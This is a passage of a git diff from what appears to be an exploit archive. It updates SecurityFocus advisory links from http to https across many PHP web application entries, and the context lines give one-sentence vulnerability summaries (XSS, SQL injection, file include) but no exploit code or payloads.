https://www.securityfocus.com/bid/14421/info Easypx41 is prone to multiple variable injection vulnerabilities. diff --git a/exploits/php/webapps/26049.txt b/exploits/php/webapps/26049.txt index e9bef2e02..a21376593 100644 --- a/exploits/php/webapps/26049.txt +++ b/exploits/php/webapps/26049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14423/info +source: https://www.securityfocus.com/bid/14423/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26050.txt b/exploits/php/webapps/26050.txt index bf18670b1..b40b00338 100644 --- a/exploits/php/webapps/26050.txt +++ b/exploits/php/webapps/26050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14423/info +source: https://www.securityfocus.com/bid/14423/info VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26051.txt b/exploits/php/webapps/26051.txt index 794db9347..194a50d49 100644 --- a/exploits/php/webapps/26051.txt +++ b/exploits/php/webapps/26051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14425/info +source: https://www.securityfocus.com/bid/14425/info Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors. diff --git a/exploits/php/webapps/26052.txt b/exploits/php/webapps/26052.txt index 2d910a699..c650cafb0 100644 --- a/exploits/php/webapps/26052.txt +++ b/exploits/php/webapps/26052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14425/info +source: https://www.securityfocus.com/bid/14425/info Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors. diff --git a/exploits/php/webapps/26053.txt b/exploits/php/webapps/26053.txt index 3e05f1708..c54d815aa 100644 --- a/exploits/php/webapps/26053.txt +++ b/exploits/php/webapps/26053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14426/info +source: https://www.securityfocus.com/bid/14426/info PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26054.txt b/exploits/php/webapps/26054.txt index 19e0f20a3..546e9ba7d 100644 --- a/exploits/php/webapps/26054.txt +++ b/exploits/php/webapps/26054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14426/info +source: https://www.securityfocus.com/bid/14426/info PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26055.txt b/exploits/php/webapps/26055.txt index fcacf91b4..8cc3b10b2 100644 --- a/exploits/php/webapps/26055.txt +++ b/exploits/php/webapps/26055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14429/info +source: https://www.securityfocus.com/bid/14429/info Ragnarok Online Control Panel (ROCP) is prone to a vulnerability that may let remote attackers bypass user authentication. This issue is related to how PHP variables are handled, letting an attacker influence a variable that is used to check user authentication. diff --git a/exploits/php/webapps/26056.txt b/exploits/php/webapps/26056.txt index 9aa57d37e..9b4ad1906 100644 --- a/exploits/php/webapps/26056.txt +++ b/exploits/php/webapps/26056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26057.txt b/exploits/php/webapps/26057.txt index 2f49fe7fe..712d658b2 100644 --- a/exploits/php/webapps/26057.txt +++ b/exploits/php/webapps/26057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26058.txt b/exploits/php/webapps/26058.txt index 5ab11fd8a..618104266 100644 --- a/exploits/php/webapps/26058.txt +++ b/exploits/php/webapps/26058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14436/info +source: https://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26059.txt b/exploits/php/webapps/26059.txt index 8b983fa68..216417019 100644 --- a/exploits/php/webapps/26059.txt +++ b/exploits/php/webapps/26059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14439/info +source: https://www.securityfocus.com/bid/14439/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26061.txt b/exploits/php/webapps/26061.txt index ab2c999bc..e5cab5ab8 100644 --- a/exploits/php/webapps/26061.txt +++ b/exploits/php/webapps/26061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14442/info +source: https://www.securityfocus.com/bid/14442/info PHPFreeNews is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26062.txt b/exploits/php/webapps/26062.txt index e45ff2a60..0f50f0089 100644 --- a/exploits/php/webapps/26062.txt +++ b/exploits/php/webapps/26062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14444/info +source: https://www.securityfocus.com/bid/14444/info OpenBook is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26063.txt b/exploits/php/webapps/26063.txt index 70e6968c6..aad5a63c5 100644 --- a/exploits/php/webapps/26063.txt +++ b/exploits/php/webapps/26063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14454/info +source: https://www.securityfocus.com/bid/14454/info Naxtor Shopping Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26064.txt b/exploits/php/webapps/26064.txt index 0613ec7c7..093cfe104 100644 --- a/exploits/php/webapps/26064.txt +++ b/exploits/php/webapps/26064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14456/info +source: https://www.securityfocus.com/bid/14456/info Naxtor Shopping Cart is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26067.txt b/exploits/php/webapps/26067.txt index ef3473973..d4c299520 100644 --- a/exploits/php/webapps/26067.txt +++ b/exploits/php/webapps/26067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14464/info +source: https://www.securityfocus.com/bid/14464/info Web content management is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26068.txt b/exploits/php/webapps/26068.txt index e87a78a96..0dbe569ad 100644 --- a/exploits/php/webapps/26068.txt +++ b/exploits/php/webapps/26068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14464/info +source: https://www.securityfocus.com/bid/14464/info Web content management is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26072.txt b/exploits/php/webapps/26072.txt index f1eec51d3..40cb80bd4 100644 --- a/exploits/php/webapps/26072.txt +++ b/exploits/php/webapps/26072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14474/info +source: https://www.securityfocus.com/bid/14474/info Portail PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26079.txt b/exploits/php/webapps/26079.txt index 5c57c1b1e..fe551fb44 100644 --- a/exploits/php/webapps/26079.txt +++ b/exploits/php/webapps/26079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14478/info +source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26080.txt b/exploits/php/webapps/26080.txt index 4fc423459..ff3339665 100644 --- a/exploits/php/webapps/26080.txt +++ b/exploits/php/webapps/26080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14479/info +source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. diff --git a/exploits/php/webapps/26081.txt b/exploits/php/webapps/26081.txt index 302d5c470..cd8c06a4f 100644 --- a/exploits/php/webapps/26081.txt +++ b/exploits/php/webapps/26081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26082.txt b/exploits/php/webapps/26082.txt index 20b95aaf6..1db28b36b 100644 --- a/exploits/php/webapps/26082.txt +++ b/exploits/php/webapps/26082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26083.txt b/exploits/php/webapps/26083.txt index 65e4ba835..372bd9545 100644 --- a/exploits/php/webapps/26083.txt +++ b/exploits/php/webapps/26083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26084.txt b/exploits/php/webapps/26084.txt index 0574fecc9..23b1cddcd 100644 --- a/exploits/php/webapps/26084.txt +++ b/exploits/php/webapps/26084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26085.txt b/exploits/php/webapps/26085.txt index 299a15e92..df5179674 100644 --- a/exploits/php/webapps/26085.txt +++ b/exploits/php/webapps/26085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26086.txt b/exploits/php/webapps/26086.txt index dc5f29d34..070f6f5f8 100644 --- a/exploits/php/webapps/26086.txt +++ b/exploits/php/webapps/26086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26087.txt b/exploits/php/webapps/26087.txt index e8215ccfb..0d1db204f 100644 --- a/exploits/php/webapps/26087.txt +++ b/exploits/php/webapps/26087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26088.txt b/exploits/php/webapps/26088.txt index 55d914c7d..ce2401fbe 100644 --- a/exploits/php/webapps/26088.txt +++ b/exploits/php/webapps/26088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26089.txt b/exploits/php/webapps/26089.txt index e11a2aeb6..9b08a0054 100644 --- a/exploits/php/webapps/26089.txt +++ b/exploits/php/webapps/26089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26090.txt b/exploits/php/webapps/26090.txt index 4d44c53c0..960eca0a9 100644 --- a/exploits/php/webapps/26090.txt +++ b/exploits/php/webapps/26090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26091.txt b/exploits/php/webapps/26091.txt index 2bb11d551..0f9118f6d 100644 --- a/exploits/php/webapps/26091.txt +++ b/exploits/php/webapps/26091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26092.txt b/exploits/php/webapps/26092.txt index fe06cced1..836c08995 100644 --- a/exploits/php/webapps/26092.txt +++ b/exploits/php/webapps/26092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26093.txt b/exploits/php/webapps/26093.txt index 31329d370..7a5b3e5e2 100644 --- a/exploits/php/webapps/26093.txt +++ b/exploits/php/webapps/26093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26094.txt b/exploits/php/webapps/26094.txt index f4d272b45..e4bf57974 100644 --- a/exploits/php/webapps/26094.txt +++ b/exploits/php/webapps/26094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26095.txt b/exploits/php/webapps/26095.txt index 26435c79d..94185da00 100644 --- a/exploits/php/webapps/26095.txt +++ b/exploits/php/webapps/26095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26096.txt b/exploits/php/webapps/26096.txt index 47997e012..584f0876d 100644 --- a/exploits/php/webapps/26096.txt +++ b/exploits/php/webapps/26096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26097.txt b/exploits/php/webapps/26097.txt index 2eccca884..d970d650e 100644 --- a/exploits/php/webapps/26097.txt +++ b/exploits/php/webapps/26097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26098.txt b/exploits/php/webapps/26098.txt index 97a3d8a5d..a239e39fa 100644 --- a/exploits/php/webapps/26098.txt +++ b/exploits/php/webapps/26098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14483/info +source: https://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26099.txt b/exploits/php/webapps/26099.txt index e351e5bcc..5bd14581c 100644 --- a/exploits/php/webapps/26099.txt +++ b/exploits/php/webapps/26099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14483/info +source: https://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26102.txt b/exploits/php/webapps/26102.txt index cee261825..3e6470038 100644 --- a/exploits/php/webapps/26102.txt +++ b/exploits/php/webapps/26102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14489/info +source: https://www.securityfocus.com/bid/14489/info PHP-Fusion is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26103.txt b/exploits/php/webapps/26103.txt index 90d6147b0..3c61fec82 100644 --- a/exploits/php/webapps/26103.txt +++ b/exploits/php/webapps/26103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14490/info +source: https://www.securityfocus.com/bid/14490/info SysCP is affected by multiple script execution vulnerabilities. diff --git a/exploits/php/webapps/26104.html b/exploits/php/webapps/26104.html index ec389e291..5297b763e 100644 --- a/exploits/php/webapps/26104.html +++ b/exploits/php/webapps/26104.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14492/info +source: https://www.securityfocus.com/bid/14492/info Invision Power Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26105.html b/exploits/php/webapps/26105.html index 3ed4c5a25..c8d49b717 100644 --- a/exploits/php/webapps/26105.html +++ b/exploits/php/webapps/26105.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14495/info +source: https://www.securityfocus.com/bid/14495/info e107 Website System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26106.txt b/exploits/php/webapps/26106.txt index ee502a83f..a92e40899 100644 --- a/exploits/php/webapps/26106.txt +++ b/exploits/php/webapps/26106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14497/info +source: https://www.securityfocus.com/bid/14497/info Gravity Board X (GBX) is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26111.txt b/exploits/php/webapps/26111.txt index ddd6e8ace..ad08b261f 100644 --- a/exploits/php/webapps/26111.txt +++ b/exploits/php/webapps/26111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14502/info +source: https://www.securityfocus.com/bid/14502/info Gravity Board X (GBX) is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged functions. diff --git a/exploits/php/webapps/26112.txt b/exploits/php/webapps/26112.txt index bb0096317..70a3fb5d6 100644 --- a/exploits/php/webapps/26112.txt +++ b/exploits/php/webapps/26112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26113.txt b/exploits/php/webapps/26113.txt index c7fd7289a..bc844d0e8 100644 --- a/exploits/php/webapps/26113.txt +++ b/exploits/php/webapps/26113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26114.txt b/exploits/php/webapps/26114.txt index b32564cae..a250a362a 100644 --- a/exploits/php/webapps/26114.txt +++ b/exploits/php/webapps/26114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26115.txt b/exploits/php/webapps/26115.txt index fab657e7b..7d878fbb4 100644 --- a/exploits/php/webapps/26115.txt +++ b/exploits/php/webapps/26115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14505/info +source: https://www.securityfocus.com/bid/14505/info Calendar Express is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26116.txt b/exploits/php/webapps/26116.txt index 780dffda6..41026ed9f 100644 --- a/exploits/php/webapps/26116.txt +++ b/exploits/php/webapps/26116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14506/info +source: https://www.securityfocus.com/bid/14506/info Chipmunk CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26117.txt b/exploits/php/webapps/26117.txt index 7702fa76b..8ed8b8111 100644 --- a/exploits/php/webapps/26117.txt +++ b/exploits/php/webapps/26117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26118.txt b/exploits/php/webapps/26118.txt index b2f3802df..b9aba8742 100644 --- a/exploits/php/webapps/26118.txt +++ b/exploits/php/webapps/26118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26119.txt b/exploits/php/webapps/26119.txt index fad584e30..7b3f90926 100644 --- a/exploits/php/webapps/26119.txt +++ b/exploits/php/webapps/26119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26120.txt b/exploits/php/webapps/26120.txt index 81029c377..23fe7023d 100644 --- a/exploits/php/webapps/26120.txt +++ b/exploits/php/webapps/26120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26121.txt b/exploits/php/webapps/26121.txt index f8b525eb3..ee193d5d5 100644 --- a/exploits/php/webapps/26121.txt +++ b/exploits/php/webapps/26121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26122.txt b/exploits/php/webapps/26122.txt index 98ec755cf..adb5e671b 100644 --- a/exploits/php/webapps/26122.txt +++ b/exploits/php/webapps/26122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26127.txt b/exploits/php/webapps/26127.txt index b113c4702..49100795f 100644 --- a/exploits/php/webapps/26127.txt +++ b/exploits/php/webapps/26127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14516/info +source: https://www.securityfocus.com/bid/14516/info TClanPortal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26140.txt b/exploits/php/webapps/26140.txt index 75dd0a85c..6a76358a2 100644 --- a/exploits/php/webapps/26140.txt +++ b/exploits/php/webapps/26140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26141.txt b/exploits/php/webapps/26141.txt index 1c4845d36..0cd11c8f4 100644 --- a/exploits/php/webapps/26141.txt +++ b/exploits/php/webapps/26141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26142.txt b/exploits/php/webapps/26142.txt index e6a5307dc..17754980d 100644 --- a/exploits/php/webapps/26142.txt +++ b/exploits/php/webapps/26142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26143.txt b/exploits/php/webapps/26143.txt index 8136ba174..2e98185c6 100644 --- a/exploits/php/webapps/26143.txt +++ b/exploits/php/webapps/26143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26144.txt b/exploits/php/webapps/26144.txt index 95de9ead6..7160e08c6 100644 --- a/exploits/php/webapps/26144.txt +++ b/exploits/php/webapps/26144.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14535/info +source: https://www.securityfocus.com/bid/14535/info PHPTB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26146.txt b/exploits/php/webapps/26146.txt index 6b9eda6ab..2739fa1cc 100644 --- a/exploits/php/webapps/26146.txt +++ b/exploits/php/webapps/26146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14538/info +source: https://www.securityfocus.com/bid/14538/info VegaDNS is vulnerable to cross-site scripting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26147.txt b/exploits/php/webapps/26147.txt index f33569870..f9d924e44 100644 --- a/exploits/php/webapps/26147.txt +++ b/exploits/php/webapps/26147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26148.txt b/exploits/php/webapps/26148.txt index 05f3872d5..e6f0e35e8 100644 --- a/exploits/php/webapps/26148.txt +++ b/exploits/php/webapps/26148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26149.txt b/exploits/php/webapps/26149.txt index 6f46d1ff9..570508f0b 100644 --- a/exploits/php/webapps/26149.txt +++ b/exploits/php/webapps/26149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26150.txt b/exploits/php/webapps/26150.txt index 040e8dcf3..ec4e82bcd 100644 --- a/exploits/php/webapps/26150.txt +++ b/exploits/php/webapps/26150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26153.txt b/exploits/php/webapps/26153.txt index 1555adb6a..f881b3697 100644 --- a/exploits/php/webapps/26153.txt +++ b/exploits/php/webapps/26153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14570/info +source: https://www.securityfocus.com/bid/14570/info My Image Gallery is prone to multiple cross-site scripting vulnerabilities due to improper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26155.txt b/exploits/php/webapps/26155.txt index 529cb68e2..04873f56d 100644 --- a/exploits/php/webapps/26155.txt +++ b/exploits/php/webapps/26155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14576/info +source: https://www.securityfocus.com/bid/14576/info ECW Shop is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26157.txt b/exploits/php/webapps/26157.txt index bbdb3117e..b1345eb39 100644 --- a/exploits/php/webapps/26157.txt +++ b/exploits/php/webapps/26157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14578/info +source: https://www.securityfocus.com/bid/14578/info ECW Shop is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26158.txt b/exploits/php/webapps/26158.txt index 783d27eae..6f3b781e3 100644 --- a/exploits/php/webapps/26158.txt +++ b/exploits/php/webapps/26158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14579/info +source: https://www.securityfocus.com/bid/14579/info ECW Shop is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26159.txt 